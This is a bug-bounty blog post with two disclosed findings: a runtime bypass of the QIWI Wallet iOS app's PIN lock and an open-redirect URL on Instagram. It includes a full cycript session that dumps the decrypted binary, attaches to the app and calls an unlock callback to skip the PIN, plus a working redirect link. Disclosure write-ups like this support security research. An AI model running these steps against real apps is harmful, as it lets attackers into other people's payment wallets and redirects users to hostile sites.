How I Was Able To Bypass The Security Code of QIWI Wallet? #iOS #Runtime

Another day, Another Blog!

So, sometime during 2014 I took part in a private bounty programme run by QIWI, in which I was able to bypass the security passcode of the QIWI Wallet iOS app, which let me log into a user's wallet and payments section without knowing the code. (Reversing + Runtime Analysis)

Runtime Analysis?

Runtime analysis means reversing and analysing an application's workflow while it executes: attaching to the live process to bypass security locks, perform authentication-bypass attacks, read sensitive information from memory, break logic checks and reach restricted areas of the application. Unlike static reversing, it lets you call the application's own methods with arguments of your choosing.

QIWI?

QIWI is a payment service used to pay for everyday services.

Users can make payments to companies such as mobile operators and utility providers, through whichever payment method each user finds convenient and instant.
What was in scope?
Well, pretty much everything!
This includes their Web/Android/iOS applications.

As I had joined the programme late, I jumped straight onto iOS, which is my favourite platform to work on.

After registering and logging into the application, it prompted me to set a PIN code, which acts as the application's local authentication mechanism: the PIN is used to let the user back into the application instead of asking for the password and going through the whole server-side login process again. In other words, the PIN screen is a client-side gate in front of a session that is already established.

Once the security code is set, the app prompts for the security code whenever a user launches the application, as shown below:

FIG-1

I immediately suspected that the application was calling some specific interface at launch to put up the lock screen, and that whatever that interface does on a successful PIN entry could be triggered another way. Time to find it 😈

Note: By default, almost all applications on the Apple App Store are encrypted (FairPlay DRM) to stop hackers and crackers from reversing and cracking them. The encrypted binary has to be dumped from a running process on a jailbroken device before tools like class-dump can read it.

Step – 1: Reversing the Binary

I used 'Clutch' to dump a decrypted copy of the application binary and 'class-dump' to extract the Objective-C class and method declarations from it. Reversing the binary gives an insight into what is actually going on inside the application, and the class dump in particular lists every selector you can later call at runtime.

Step – 2: Hooking Onto the Application

After obtaining the class dump of the binary, I had to find out which view controller instance was being displayed. So I attached to the running QIWI Wallet process with 'cycript' to obtain the view controller instance of the screen currently on display.

FIG-2 and FIG-5-2

Step -3: The Bypass

Searching the class dump for the 'IPhoneAppDelegate' interface revealed that 'IPhoneAppDelegate' inherits from a class called '_ABAddressBookCopyArrayOfAllPeople'. (That name matches a C function from the AddressBook framework, so it is most likely a stripped or misresolved symbol rather than the real class name; it does not matter for what follows.)

FIG-3-2

In Objective-C, methods declared on a parent class ('_ABAddressBookCopyArrayOfAllPeople') can be invoked on an instance of its child class ('IPhoneAppDelegate'), so anything the parent exposes is reachable through the app delegate object.

Exploring the parent class, '_ABAddressBookCopyArrayOfAllPeople', revealed an interesting method called 'authenticationDataSourceDidUnlock'.

FIG-4

😕 Wonder what it does?

Invoking 'authenticationDataSourceDidUnlock' directly from the 'cycript' prompt logged me into the application without the need for a security code. The PIN screen was only a client-side gate: the callback it fires once it considers itself unlocked can be triggered by anyone with runtime access to the process, so the PIN never has to be entered, let alone guessed.
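The three steps above as one cycript session. This is an added example, not a transcript from the original post: it assumes the process is named "QIWI", that the Clutch dump and class-dump were done beforehand, and that the inherited callback is invoked on the app delegate instance (the post does not say which object it was called on).

```cycript
// Added example, not the author's session. Assumptions: process name "QIWI",
// the unlock callback is reached through the app delegate instance.
//
// Prerequisites, typed on the jailbroken device (Clutch, cycript) and the
// host (class-dump) before attaching:
//   Clutch -i                        // list installed App Store apps
//   Clutch -d <index-from-list>      // dump a decrypted .ipa
//   class-dump -H -o headers/ QIWI   // one header per Objective-C class
//   cycript -p QIWI                  // attach to the running process

// Step 2: which screen is on top? Walk from the key window down the chain
// of presented view controllers to the lock screen.
var top = UIApp.keyWindow.rootViewController;
while (top.presentedViewController) top = top.presentedViewController;
[top description];

// Step 3: grab the app delegate and compare its class chain with the dump
// (expected per the class dump: IPhoneAppDelegate : _ABAddressBookCopyArrayOfAllPeople).
var delegate = UIApp.delegate;
[delegate class];
[[delegate class] superclass];

// Confirm the inherited selector is reachable through the delegate before
// calling it; an inherited method resolves on the child instance.
[delegate respondsToSelector:@selector(authenticationDataSourceDidUnlock)];

// Fire the "PIN verified" callback without ever entering the PIN.
[delegate authenticationDataSourceDidUnlock];
```

The practitioner's takeaway is the check, not the call: any lock whose only effect is to dismiss a view can be flipped from a runtime prompt. A PIN gate that survives this has to make the unlocked state depend on something the UI cannot produce on its own, for example a session key derived from the PIN or a server-side verification, rather than a boolean that a "did unlock" callback sets.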

POC:


Submitted: Nov 14, 2014
Acknowledged: Dec 5, 2014
Bounty: 😉

URL Redirection Vulnerability on Instagram !

Hey guys,

I think it's high time I documented all my findings, starting with Instagram!

Instagram is an online mobile photo-sharing, video-sharing and social networking service that enables its users to take pictures and videos and share them on a variety of social networking platforms, such as Facebook, Twitter, Tumblr and Flickr.

In mid-May 2014, I came across a URL redirection vulnerability on Instagram: the 'next' parameter of the checkpoint endpoint was used as a redirect target without checking that it pointed back to instagram.com, so a crafted link would send any logged-in user to an attacker-controlled domain 😉

Redirection URL:

http://instagram.com/integrity/checkpoint/?next=http://google.com#

POC:


Submitted: May 11, 2014
Fixed On: May 23, 2014
Bounty: Yes